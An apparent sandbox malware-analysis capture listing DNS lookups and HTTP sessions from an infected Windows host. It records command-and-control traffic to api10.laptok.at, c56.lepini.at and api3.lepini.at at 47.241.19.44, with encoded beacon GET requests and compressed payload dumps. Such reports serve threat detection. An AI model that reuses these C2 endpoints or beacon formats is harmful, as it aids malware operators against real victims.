Nov 23, 2020 12:19:07.614770889 CET	192.168.2.4	8.8.8.8	0x39b8	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Nov 23, 2020 12:19:13.540397882 CET	192.168.2.4	8.8.8.8	0x12c8	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Nov 23, 2020 12:19:18.798482895 CET	192.168.2.4	8.8.8.8	0x2e40	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Nov 23, 2020 12:19:59.753671885 CET	192.168.2.4	8.8.8.8	0x48d6	Standard query (0)	c56.lepini.at	A (IP address)	IN (0x0001)
Nov 23, 2020 12:20:09.503115892 CET	192.168.2.4	8.8.8.8	0x4f3c	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Nov 23, 2020 12:20:09.535417080 CET	192.168.2.4	208.67.222.222	0x1	Standard query (0)	222.222.67.208.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Nov 23, 2020 12:20:09.553596020 CET	192.168.2.4	208.67.222.222	0x2	Standard query (0)	myip.opendns.com	A (IP address)	IN (0x0001)
Nov 23, 2020 12:20:09.586766005 CET	192.168.2.4	208.67.222.222	0x3	Standard query (0)	myip.opendns.com	28	IN (0x0001)
Nov 23, 2020 12:20:13.144649029 CET	192.168.2.4	8.8.8.8	0x78fd	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Nov 23, 2020 12:20:15.013784885 CET	192.168.2.4	8.8.8.8	0xd522	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 23, 2020 12:19:07.939614058 CET	8.8.8.8	192.168.2.4	0x39b8	No error (0)	api10.laptok.at		47.241.19.44	A (IP address)	IN (0x0001)
Nov 23, 2020 12:19:13.581149101 CET	8.8.8.8	192.168.2.4	0x12c8	No error (0)	api10.laptok.at		47.241.19.44	A (IP address)	IN (0x0001)
Nov 23, 2020 12:19:18.834115028 CET	8.8.8.8	192.168.2.4	0x2e40	No error (0)	api10.laptok.at		47.241.19.44	A (IP address)	IN (0x0001)
Nov 23, 2020 12:19:59.789554119 CET	8.8.8.8	192.168.2.4	0x48d6	No error (0)	c56.lepini.at		47.241.19.44	A (IP address)	IN (0x0001)
Nov 23, 2020 12:20:09.530307055 CET	8.8.8.8	192.168.2.4	0x4f3c	No error (0)	resolver1.opendns.com		208.67.222.222	A (IP address)	IN (0x0001)
Nov 23, 2020 12:20:09.552117109 CET	208.67.222.222	192.168.2.4	0x1	No error (0)	222.222.67.208.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Nov 23, 2020 12:20:09.570106983 CET	208.67.222.222	192.168.2.4	0x2	No error (0)	myip.opendns.com		84.17.52.25	A (IP address)	IN (0x0001)
Nov 23, 2020 12:20:09.603360891 CET	208.67.222.222	192.168.2.4	0x3	Name error (3)	myip.opendns.com	none	none	28	IN (0x0001)
Nov 23, 2020 12:20:13.472007036 CET	8.8.8.8	192.168.2.4	0x78fd	No error (0)	api3.lepini.at		47.241.19.44	A (IP address)	IN (0x0001)
Nov 23, 2020 12:20:15.049266100 CET	8.8.8.8	192.168.2.4	0xd522	No error (0)	api3.lepini.at		47.241.19.44	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

api10.laptok.at

c56.lepini.at

api3.lepini.at

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49732	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 23, 2020 12:19:08.224163055 CET	318	OUT	GET /api1/OdjgwCqVJwPbZSsZ/VYrVT8VCOKL6QD5/EVmo1TumZD8KFbU_2F/DqCRYFqUt/6t1Wi5sZ6Sd10ZyeuxsI/zz_2BvVs4Qba4SjUA81/XTlzG2Ikb6e4IhPsrP2pW5/IOYwufo82QfRm/dMck8gxG/UZU1HPUj7EpbLym6Tf1ZXia/MduJyH_2BJ/WUEq3SnF_2FcXcMTp/Xq474GevRlOt/vDC5iQyZB9v/TjWELQbwGzWKMO/lagHfBD7ms5J_2BDQZ3w8/PtBT4jSv2lZUfu_0/A_0DP97GvnPGpv0/X1fJAQJ3FbyqO_2B4n/YGBi_2Ftdmzlg/gz3C3rVo/j HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Nov 23, 2020 12:19:09.288871050 CET	331	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Nov 2020 11:19:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9a 45 a2 a3 40 14 45 17 c4 00 b7 21 0e c1 5d 66 b8 bb b3 fa fe bd 81 24 54 bd 77 ef 39 49 f4 28 f5 80 1e 1b f5 c3 d7 e8 32 b6 1e 44 19 b6 25 18 f1 73 f9 10 eb 3a 0e 2d 86 57 cb 8b 31 81 b4 a0 96 0f 75 5e f5 83 4d d7 da 30 71 34 e7 ba a8 ca e2 b8 9e 60 32 ac 30 a5 c5 d9 d4 e8 c1 cc 07 18 92 5d ca 65 a0 33 b1 0a e4 b2 29 f3 47 24 1f 9d 98 0a 61 d6 fc c0 53 b6 74 70 fb 51 3b 56 75 39 3d 85 11 28 8e 32 47 2c 62 8b 15 3c 7c 3c a0 a1 70 3f 14 6f 51 dd aa d8 c5 65 30 29 26 30 11 f2 37 54 2d 85 6a cb 07 05 62 bf 52 ba 45 74 65 c8 ea 14 84 00 1e 81 de 81 a6 75 1b 7e 23 c8 9e be 5d 2a c6 82 93 fd a0 e4 e6 13 86 5d 80 bc 85 d1 3a 12 e3 5d 62 f7 33 4e bb 09 ea 5f 35 ae 8e d3 e4 41 b3 d1 cf 54 fb 11 46 1c ef cf 70 ba a4 a6 c6 7a 1f 91 11 c4 82 55 d0 5e f2 b5 9a 7d 2d ac 71 50 ed b5 0b 0d 85 09 28 65 bb a9 9f 1e 02 7d 20 d8 3e fa 16 27 11 e4 4f 15 0d 03 11 13 75 ce 8d a4 e5 d9 39 92 d1 59 c7 20 1c ff 53 02 fc d7 9c 06 59 df fe 48 37 dd cf 6c cb 67 69 d7 6e 58 ea 35 ae 8b 5f 7c da f0 8e 46 cf 48 df 62 2a 03 b6 ac 52 7a d1 02 10 94 21 64 6f d1 38 e0 36 b1 83 77 92 46 ee 0a 58 ee 08 7e c8 24 16 c6 ba 3e f9 bf fc d1 03 35 6b f5 c2 fa dd cb 4d ad d1 df 4b 64 87 8c 1a 8e 11 93 9f f5 44 cd 94 c6 9f 1d 17 ae 42 ce e7 ae bf 27 45 6e 0e 2d 5b c9 48 94 e6 4d bf 9f 17 d2 6b 32 f8 86 9b c0 70 cd c8 ad 46 99 6d b6 69 0d 33 4c c6 77 51 f8 6d 0c 43 7f bc 2b eb 5e 56 93 a2 fa 06 8c 8a 3d 58 52 65 54 4b 10 08 0c 63 27 9f 95 78 4e 5b 1f cf 4f f7 b6 96 33 64 46 a1 d2 49 57 7b 1a e8 d8 d8 c1 28 c9 d0 bd 9c 21 bb dc 97 50 bf 67 a8 0a 56 5f 10 aa 7c 0c 14 70 b4 97 a9 ae e3 f6 9d 16 7f 25 0e 21 f7 30 c7 5d 66 38 c5 73 12 65 9b 82 90 3e d6 f4 69 b4 84 af f3 e8 c9 62 a1 fc 5b 9d 35 3a 63 45 29 ec c6 4c e1 65 32 6f 57 25 fc d6 dd 15 bd f7 c0 94 47 6a 98 99 99 6e ca 3e b1 29 a6 09 7b 09 e2 f7 15 f2 ee 48 e8 10 43 a8 7b f3 cb fe 9c 45 71 75 55 8d 95 11 e4 04 79 34 fc ea cb 22 5c c3 9f 98 e0 fb 82 63 77 17 b4 52 cb 88 da 40 13 80 7a a5 ee 04 b3 99 23 3a 95 59 28 75 b1 b3 47 80 e1 ef 5e 54 07 d4 3a 79 4f 30 42 2e 62 b4 3e 61 36 e2 e8 48 2d 5c fe aa e0 5d 14 1c 57 ed b0 ea d1 09 f5 6e 0e 26 6c e8 ad 0e b6 20 59 c4 9b 49 58 c9 1b 22 17 77 6c 95 9c c3 c7 3a a1 17 5b da 1b 21 5c 59 1d 86 0e f1 26 dd 68 05 be 47 c1 8b c8 f5 43 fd b0 cc 9d a9 12 75 dc e0 f8 1b f6 31 67 b9 27 ed 41 2a cd 9a bd 28 9c ad c3 14 f7 58 11 30 9b 61 31 25 2c ed 5e 7a 0b 6c 55 18 65 62 e1 87 89 4d d7 8a 0e e6 d1 42 6d ad 01 30 0f 08 ca 2a 27 06 66 99 30 f3 09 5b 71 7b bf 6c fc 9d a1 cc f5 03 cf 65 3a 44 19 6d b4 8f 03 86 8b 46 8a b1 ae 97 f7 65 c6 a5 32 26 39 4e 74 c2 6f 02 44 dd 71 10 7a ac 28 8c 34 1a 5b 65 09 bd 99 1f 78 14 5c 67 59 a5 1d e9 af 0f 63 a2 ac 8e 6a 6f 3d ad 43 4e d7 dd e8 b6 49 f9 eb 9d 7e 50 f0 71 ca 9b 3b dd 3a 8c ab f6 38 d9 2d 3e 8d b4 00 92 e2 30 e1 50 c7 7d 6b 41 75 1f 19 bd 35 b4 de 11 df 4a e9 37 51 ea 82 08 cf be af ca b3 71 ee a8 51 0e 6d b9 92 d4 f3 04 0e 47 2f 61 73 20 26 cd 15 f6 ba 1d 28 96 10 8f 63 0e 39 8f b3 c6 84 62 72 60 0d 14 3e c2 7c 6b 84 33 a8 d5 aa 47 3c 0b 01 6e e0 eb 15 76 2b 17 f7 03 93 75 88 bd f4 b2 ff fd 24 9c 06 5a 05 80 8a c4 7a Data Ascii: 2000E@E!]f$Tw9I(2D%s:-W1u^M0q4`20]e3)G$aStpQ;Vu9=(2G,b<\|<p?oQe0)&07T-jbREteu~#]]:]b3N_5ATFpzU^}-qP(e} >'Ou9Y SYH7lginX5_\|FHbRz!do86wFX~$>5kMKdDB'En-[HMk2pFmi3LwQmC+^V=XReTKc'xN[O3dFIW{(!PgV_\|p%!0]f8se>ib[5:cE)Le2oW%Gjn>){HC{EquUy4"\cwR@z#:Y(uG^T:yO0B.b>a6H-\]Wn&l YIX"wl:[!\Y&hGCu1g'A(X0a1%,^zlUebMBm0'f0[q{le:DmFe2&9NtoDqz(4[ex\gYcjo=CNI~Pq;:8->0P}kAu5J7QqQmG/as &(c9br`>\|k3G<nv+u$Zz
Nov 23, 2020 12:19:09.288896084 CET	333	IN	Data Raw: 85 e3 a6 67 fc 37 0d ac 77 f7 2f 80 f9 11 49 5e 62 c1 3b e2 bd 33 d5 92 8d 7e 83 f5 70 9f 35 1f f3 da 9d d6 7c 5d 7b 83 7f 83 94 bc 12 20 0a 32 b4 7d 52 05 9a 53 4a fe d2 58 a4 2e c7 fa 51 db 2f a4 5b 79 10 d3 3a 78 11 d9 90 a7 0c e5 8d 28 84 73 Data Ascii: g7w/I^b;3~p5\|]{ 2}RSJX.Q/[y:x(sUjn([qd9Ba}%aXLn^1}rwmbs^(\JJ\G7i>;YD29HwCB5uGEr;)1`}gk1SW!]_0ESoz0WO C
Nov 23, 2020 12:19:09.288908958 CET	334	IN	Data Raw: a0 82 31 8e 8c d7 d4 8d c3 37 18 c7 7c fc cd 09 38 ee 62 98 9f 5d 54 c1 c8 4e d3 1b 46 8b ae 75 fd 2c 37 3f 7b 90 e1 2c 1f ba dc 58 36 3b 9d c5 c5 1d b4 9c 7c 7f 84 1d 4d 39 44 e7 98 7a 45 ff 53 e2 c6 f4 f5 aa 70 74 ac b7 1b d4 ad c1 fe 34 fb af Data Ascii: 17\|8b]TNFu,7?{,X6;\|M9DzESpt44Xki)_$t_6C<4{"9uq~OAXUZC=z\|(FG FxN#1ieuLgqrDv>uOZd2Ypnh\|:*'{`f}[=D:
Nov 23, 2020 12:19:09.288919926 CET	335	IN	Data Raw: 63 40 57 8b 9a eb 1f fa 5d cb ea 77 8d da df d6 a4 b2 bf 4b 00 7d 39 e7 a8 f7 de 01 f2 fc 1b 94 34 16 b2 9f 9e 14 a2 44 57 09 6b f2 bf 27 8d 71 4f a7 b9 79 b0 c7 6c 37 b3 10 11 90 cf 6c b1 04 02 a2 d8 f0 b3 ef 8a 79 d4 61 18 fd f6 fd eb 95 fe c2 Data Ascii: c@W]wK}94DWk'qOyl7lya1='CU`A@\|m8s~L)7T.]!/3t.`td}?9k7L@c*bSBOU+!"rC fDa[eu#'<@AgeL%\|l~
Nov 23, 2020 12:19:09.288933039 CET	337	IN	Data Raw: e9 93 05 ec fc 94 b9 e9 06 b2 40 83 d9 6e 33 f8 2e 52 c4 26 ac d3 2f a3 7f 31 44 e8 61 87 db b7 13 61 74 15 12 cc ca c8 30 6a bf 21 54 eb 46 81 46 09 64 13 3d 1b 0c bb 06 f5 af a2 dd 98 50 e3 44 38 5a 50 9f ae d9 8f 28 0b 18 30 16 89 b1 97 80 78 Data Ascii: @n3.R&/1Daat0j!TFFd=PD8ZP(0xXz/a\4hb*_at8z_{eH/BP{2'Gyo"sdIL,Fw?f@Ao2^:b9 E+Qvnj5H'U'32@"QTN6`>n!S
Nov 23, 2020 12:19:09.288944960 CET	338	IN	Data Raw: 76 f0 7f 87 8a 0c 94 34 e8 a9 07 ca bf 20 85 fe f6 af 51 7f f4 65 2d 65 f2 41 29 6a 2b 71 7a 21 20 30 86 83 24 4d cf 6a b1 c7 df 11 e4 ed dc 56 0d 13 82 17 31 25 29 9d d8 b6 a1 ec 08 43 c0 00 21 32 15 e8 8b 9f 88 c7 6a 8f 4f 42 6e 95 90 01 fe d0 Data Ascii: v4 Qe-eA)j+qz! 0$MjV1%)C!2jOBnn"\|c&8+>YBU8DA27kE@PMH!8@7,EW$4NaSPG$GH%7flu3>D&2?!t~0yF!V
Nov 23, 2020 12:19:09.328711033 CET	340	IN	Data Raw: 42 c9 06 4f f4 3f a9 9f a7 e8 3d de 33 7c 5a c1 92 6e 6b a1 78 13 9d 92 1f eb 30 35 4b 22 46 bf 3e 04 c5 c2 12 68 64 93 03 e2 68 bc 83 b3 5f 2b 29 ad 24 c0 92 80 ea 55 c4 9c 9e 00 33 ee 29 cd 83 6a 47 dd 96 c5 d4 91 d3 02 4e 52 c7 df c9 67 48 5a Data Ascii: BO?=3\|Znkx05K"F>hdh_+)$U3)jGNRgHZFFDs9f-Aer}bgVX@\|XDK~HPh3@>,/al!(Cbm:[=]9QR'J'\[x\|}L-c+!tA,EB:}?~3pQ2]D
Nov 23, 2020 12:19:09.328738928 CET	341	IN	Data Raw: 05 79 96 1c 24 38 8c b7 3e 8f 3b 9a 48 79 6b 00 85 da 14 10 f6 b9 bf 24 39 fe 7c 01 52 e1 44 f3 e8 1c f1 1b f1 6a 0b dc a0 10 5f 5a e7 3f 01 f1 f0 5e 89 a5 b0 73 13 3d fb 53 06 b3 fd 1d 46 c1 79 c2 fc b6 e4 95 0b 37 66 99 71 fb 67 99 ed 19 85 d4 Data Ascii: y$8>;Hyk$9\|RDj_Z?^s=SFy7fqgW6C!@S.SI~~>KKCM4Fhj;/s?<8v(bVH75Z@<;c/{"O#_D@k0) I{I=\f:* w<i(
Nov 23, 2020 12:19:09.328756094 CET	342	IN	Data Raw: d1 1b ca c2 fd fb 0b 46 3d 84 dc 21 c5 02 2b 1b 43 8e dc 04 76 51 22 d9 0c 20 4b a2 5d 40 37 e5 ef cc 50 df 42 2a 9d 25 43 06 7e 72 9b b7 e1 00 bb 05 88 00 7d 8b 88 f3 f9 d1 c2 0e 9e 55 37 96 3d b4 cf 27 c1 eb 01 c2 f5 71 8f a4 cb f2 69 28 22 29 Data Ascii: F=!+CvQ" K]@7PB*%C~r}U7='qi(")e"e\%L5L}6t".,>`3"spk3gNVC_A=N9pX`@@\|4~EkFU5C;wx]$Z"[pA(pZ
Nov 23, 2020 12:19:09.328778028 CET	344	IN	Data Raw: f4 c9 40 5e 78 81 4b cf 0b e4 19 4c ed bc a8 69 98 3e b2 c6 40 16 60 93 9b e2 97 32 cc d8 f6 e4 6b 61 8c b0 57 a9 99 83 b0 32 a9 41 9f 3e 44 6f 87 6b db 84 41 64 42 7e c4 51 b6 41 30 46 1c 3a a0 47 4a 63 a5 24 3f 1c 5b 65 d1 65 53 1b e2 49 67 03 Data Ascii: @^xKLi>@`2kaW2A>DokAdB~QA0F:GJc$?[eeSIg7y\YNZY`~He< gcGp13ulJ=o&}^\|)vxjU@(2c>:<wVPGbsW,v:Z`x$Ozv=.BBZQ
Nov 23, 2020 12:19:09.550035954 CET	345	IN	Data Raw: 23 c3 3a b6 36 48 ad 53 8f 50 9d 6e 5e 7e 40 19 d7 84 ee e9 af 04 a3 7f 5e 52 c1 f8 51 68 22 8f c7 ca 0d 08 ec d6 7f f3 c1 f4 bd 95 f8 83 cc 8d 8d 67 9e 7f ac 74 ac 0c 15 91 af 25 e5 58 7a 03 7b 9f bc d9 9b ca 76 f1 5b cb 7f 07 73 76 94 ab 05 6f Data Ascii: #:6HSPn^~@^RQh"gt%Xz{v[svooE,<Y;//H{V1_:nO<!hN8.iOFF[jv)^{IQ,>x$]sA35T<'/h%_x.>]*pnO}@

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49733	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 23, 2020 12:19:11.081012964 CET	545	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Nov 23, 2020 12:19:11.865336895 CET	554	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 23 Nov 2020 11:19:11 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49738	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 23, 2020 12:19:13.860515118 CET	574	OUT	GET /api1/HCmdTF9ssS2xPQYmTqbko/QSaXs_2BFCMwb9WJ/TzYhMx5eXoG7h0c/n88BmwhZe9ijt5oT_2/Fx6667KDX/SidvZb9thKv8bvTE_2Bd/bd09MXr6sZJK_2B0qyS/ttipC86Fa_2BhWcPHgFDgb/FLKb2aUcMy7Ws/o6qiRO8c/nNeTK_2FSOWylkimJJN1ZPK/7CLWQhh7_2/FsBidPde1di4dmq_2/FoYbJ3dZ5_2F/jbxcTO3nXc9/SExxKRXHJLHHvI/_2BhbueQTaU2MuoAANkGM/Ms1_0A_0DsFCZtvF/RsiXqTx0w_2B7BA/8qwDi436YGxlKYNqBk/I9GfQ7ay9/1WHi9CeL/hOQKKrEqdJo6/k HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Nov 23, 2020 12:19:14.887379885 CET	587	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Nov 2020 11:19:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b 47 72 83 40 10 45 0f c4 82 20 e2 92 9c 73 66 07 22 83 c8 f9 f4 c6 3b 97 5c 25 31 33 dd fd df 1b d9 fd 0f 4d 67 52 5b 13 88 1d da dd fd 12 ea 33 3f 79 9f 7e 1c ee ec 64 f7 a8 b1 56 2e 58 e4 d2 b1 5e 6e 68 04 3b 6c 71 16 0d 81 a1 3b 93 88 82 cb db 3f 44 9f 0d 98 f7 cc 22 c9 c5 39 63 ee 7b 48 08 e1 2a 4c 92 42 e1 df cd aa 2d 10 b7 1b 79 0b 83 9f eb 86 dd af 2f 3e cc de 2f 40 8e 7e 6e 07 1a 67 a1 83 b4 2d 06 d9 11 69 00 cc c9 fb 44 fa 52 cd 08 fa 69 d2 f7 0f cc 0d 81 cf 53 c2 74 31 4f 0b a5 8f d9 e6 8a 7c 04 17 6f 0c 71 7e cf 1a 5e 90 fa b4 63 6e e3 29 47 ed e8 df 35 22 1e ae 6a 50 76 05 e3 95 4e c1 51 54 b3 31 33 be c4 87 36 5a 40 3c 29 e7 a1 f3 2a 5e 10 30 03 be f8 45 8f c7 40 8f 22 29 06 68 25 9c 49 aa 7f 09 57 4c ea af b3 3c ed a7 18 41 cb 0a bf a8 38 e7 64 e4 2b 1d 65 4a 26 95 d4 03 6f 03 7a cf a1 87 a2 f7 93 83 c3 10 22 04 8c 74 58 50 ce f0 d7 71 3c 19 d7 47 4e 0b 67 b3 bd f5 c8 6d b1 16 76 e8 96 da e1 87 41 77 fc 3c 71 8a fe 09 7a 93 48 81 65 f0 dc df af a2 10 9e 4e ee 1d 02 24 36 f8 d8 21 f5 40 9b 6e cc 22 94 c4 3f 94 51 19 34 09 33 d1 6c d8 6c ca 0f 1a de 13 a3 b4 26 30 26 43 0b 22 c8 5f b8 a9 cf 06 fc 02 1c a1 21 15 c8 e0 15 47 87 58 f9 d4 7c 1c 5e 64 20 0c e5 27 9b 31 7a af cb f4 1a 37 a4 ed d7 fc 21 e1 67 6b f0 a3 75 72 4c f1 d9 bc 02 e1 34 9a 3d 11 66 3d 8c 2b a1 79 a4 2b 2a 6b be 92 1b 74 86 20 9b bb 9d 8c 5a a9 d9 b2 97 69 5f 3f f0 13 9b ca 02 d4 e5 52 cf fc 7d a6 e4 10 85 e4 7c cc 8c ab 7e cc dd 08 99 90 25 1e fd 83 c5 7c 07 39 ee 47 56 b8 02 68 1b ce 3c e4 67 e5 54 b5 d9 97 ea 53 56 42 51 35 4a a8 ef fe c9 8f 82 95 67 a5 a9 b1 fb 3e 1b 09 0b 40 88 cc 79 f1 12 a1 40 cb cf 09 3e 1e 00 2d 65 e1 98 30 71 dc 33 2d 66 a7 3d 78 a5 62 81 1d 8f 30 b1 8e d1 53 d2 3e dd c5 7e 03 95 0e 7c 1e 4d 91 3d b7 c3 25 5e 2f 02 d3 74 e1 84 46 26 cd 07 c4 0b 57 be 6a c3 80 cb dc d7 ee 8e aa 91 0f f2 d1 67 2b a9 ce 25 41 9f b9 91 65 1f 83 6d 0b 84 8f 7c ea 22 ba 6e 81 56 50 b3 23 4c 4f 78 d7 33 f2 3b 72 5e c8 d7 3c 01 de df 5e 9f 5b 25 7c 4b c0 13 8d 87 40 5c 02 86 30 87 92 ca 92 0c ca 13 1e 95 86 9e 64 0f 01 10 0c ed 9c a1 e1 38 c2 d7 06 d8 3e ab a0 60 33 9e 90 b6 ef f3 fb 5e ae 88 c2 5b 41 a2 b4 bc 4f 1f 15 e3 34 2c 25 fe d8 4b 08 be e0 16 65 83 ff e1 db 69 74 82 e3 47 d9 ce b1 01 4a 5b 24 5a 35 79 f7 b3 79 5c 13 19 d2 74 1b 29 9e 6a 48 be 1f 3c ef 96 45 88 02 9e fd a0 dd 61 fa ee 5a 6d ce 27 68 65 ec 43 ad ae 69 7e 33 14 91 89 33 b5 52 7a 1f ce d3 10 00 18 91 92 de 1a 4d 71 64 8d 46 a1 42 a6 3b 8e c5 7e 90 0d 2e c2 5f 78 02 3b 5e e1 06 e6 5f 1c 25 49 cd 8a c2 f5 57 22 f5 06 e2 9f 58 db 21 9a ac 7a 7b 08 25 19 3f 11 f7 fe 00 44 c0 93 e3 84 b6 03 1a 18 10 7e fd b8 68 15 c8 41 09 c1 f5 3a 3e 35 0c 15 83 a6 f1 5f 21 49 a1 ba 09 19 7a b8 2a 91 88 db 1a 77 ad 54 4e 1b 35 dd 0f 08 3e c0 de 40 0f a3 4d 2b 86 87 f7 bb d4 cd c7 b5 a1 2b 6f c7 9f b6 71 31 71 7e 33 e1 fe d0 b0 6e bb a7 eb aa 42 a7 bb 19 da 99 20 3b a3 24 48 c7 12 d5 72 b7 70 27 f7 3c 1c 95 01 f6 f8 5d f9 22 00 95 88 17 59 3a a0 37 88 00 5a 41 9e 5c 27 37 82 33 39 57 39 dd d7 87 4e b6 d1 fe c1 93 ce be b9 28 93 a4 7e 9b 52 b7 c6 2e 74 03 33 49 db c4 c8 Data Ascii: 2000Gr@E sf";\%13MgR[3?y~dV.X^nh;lq;?D"9c{HLB-y/>/@~ng-iDRiSt1O\|oq~^cn)G5"jPvNQT136Z@<)^0E@")h%IWL<A8d+eJ&oz"tXPq<GNgmvAw<qzHeN$6!@n"?Q43ll&0&C"_!GX\|^d '1z7!gkurL4=f=+y+kt Zi_?R}\|~%\|9GVh<gTSVBQ5Jg>@y@>-e0q3-f=xb0S>~\|M=%^/tF&Wjg+%Aem\|"nVP#LOx3;r^<^[%\|K@\0d8>`3^[AO4,%KeitGJ[$Z5yy\t)jH<EaZm'heCi~33RzMqdFB;~._x;^_%IW"X!z{%?D~hA:>5_!IzwTN5>@M++oq1q~3nB ;$Hrp'<]"Y:7ZA\'739W9N(~R.t3I
Nov 23, 2020 12:19:14.887404919 CET	588	IN	Data Raw: ec b7 8d bd 97 da 8c bb 1b d2 2a 72 3b 7c e6 08 ce 5a 95 3a b9 f1 0a 19 27 4a 04 c8 8b a7 81 d7 d2 8d 9d ae 27 24 9c ea 2e 98 42 8a c2 38 27 a4 20 91 99 c0 3f 6b 39 41 b3 ab 0b 5b a8 d0 ec 33 57 f2 6a c9 84 dc 75 eb 63 18 5c c1 d1 43 aa 60 0a cf Data Ascii: *r;\|Z:'J'$.B8' ?k9A[3Wjuc\C`&PgkDE7R)[\|[F"&yk9Y'gLmxpyKBvve&OucV:d `7)msblng;v#}"15C"Q}ID6&\|:Z^3
Nov 23, 2020 12:19:14.887420893 CET	590	IN	Data Raw: 9e a3 f4 c0 e9 f4 f8 9c a2 36 f3 1b 79 1e 22 f9 f5 21 18 fc aa 9c de 79 d8 f5 29 6c b0 9d dd 62 95 63 54 be b4 92 a0 30 40 d4 2f 36 a6 a7 38 b4 93 65 3d d8 37 0b a2 e6 6f 8d ee 5f 74 6e f7 37 49 4d e7 23 75 6c db c3 11 8e 83 98 92 12 31 bf ff 30 Data Ascii: 6y"!y)lbcT0@/68e=7o_tn7IM#ul10-:JNkJrPQS,$6H=[Tmzw=)r`nDXT9.-Moa%pl\E$Dm\$`Mr&M.
Nov 23, 2020 12:19:14.887439013 CET	591	IN	Data Raw: 2b 33 bc 79 1f d2 da 47 92 2c 48 70 b8 be 78 6c 91 ad 28 50 89 c5 cd a2 26 08 26 1c 5d 65 5f a4 cc 39 99 46 16 2d 3f e7 3e 3f cd e1 c7 92 8a 17 c7 e0 fb 2e 16 65 4c 3c dc 42 1d f5 a1 7f 82 1b e5 73 76 03 e3 b7 f4 46 e3 74 bb 62 39 2d a3 72 3b 78 Data Ascii: +3yG,Hpxl(P&&]e_9F-?>?.eL<BsvFtb9-r;xZ2DR#>SJ+Wk.XwsQ($Bh=x'IH&(sv+U1kVoPPi7qvXa9u_oI&{EM{A\|!05V*
Nov 23, 2020 12:19:14.887454987 CET	593	IN	Data Raw: cf e5 60 4c ca 44 28 c9 fd c0 63 16 a4 8b b3 88 2b cf 3e df e2 2c be f4 81 47 e8 92 07 b0 9e 23 ed 77 97 16 12 e1 5c 58 1e 86 16 0b a7 d0 90 92 4a 56 3e 3a 10 a2 a6 4e 07 45 96 0d c5 67 c9 23 6c 2a bb fe e2 b1 0b 9d bf 78 fa be 7b ce 1d f5 64 5c Data Ascii: `LD(c+>,G#w\XJV>:NEg#l*x{d\8UFZfY+OTnY48kue/4_S+B\&R0UoO{iPmSe2/>/%e^b9;Uy_LURL;;^EH6!Rf4A
Nov 23, 2020 12:19:14.887469053 CET	594	IN	Data Raw: bb 93 46 ce a3 06 5e 54 2e d9 7b 03 e9 0f ba 61 e1 db aa 95 1b 26 c5 c6 de 95 ab 8e 82 b3 cc 28 19 c2 01 ff e6 59 5c a7 fa b5 a9 de 8d 78 51 e1 99 34 2d 9b d1 64 d1 76 2d e0 86 04 fa dc b5 74 1f 7a f1 44 46 3f 9b 73 48 fc 14 d6 3d d9 be ba 6a 06 Data Ascii: F^T.{a&(Y\xQ4-dv-tzDF?sH=j-@PyF#:"fm~CswD;_m8OmMU;eG*_qNl[N.cMdWZKe:\Ixu{o:['L}o}#A
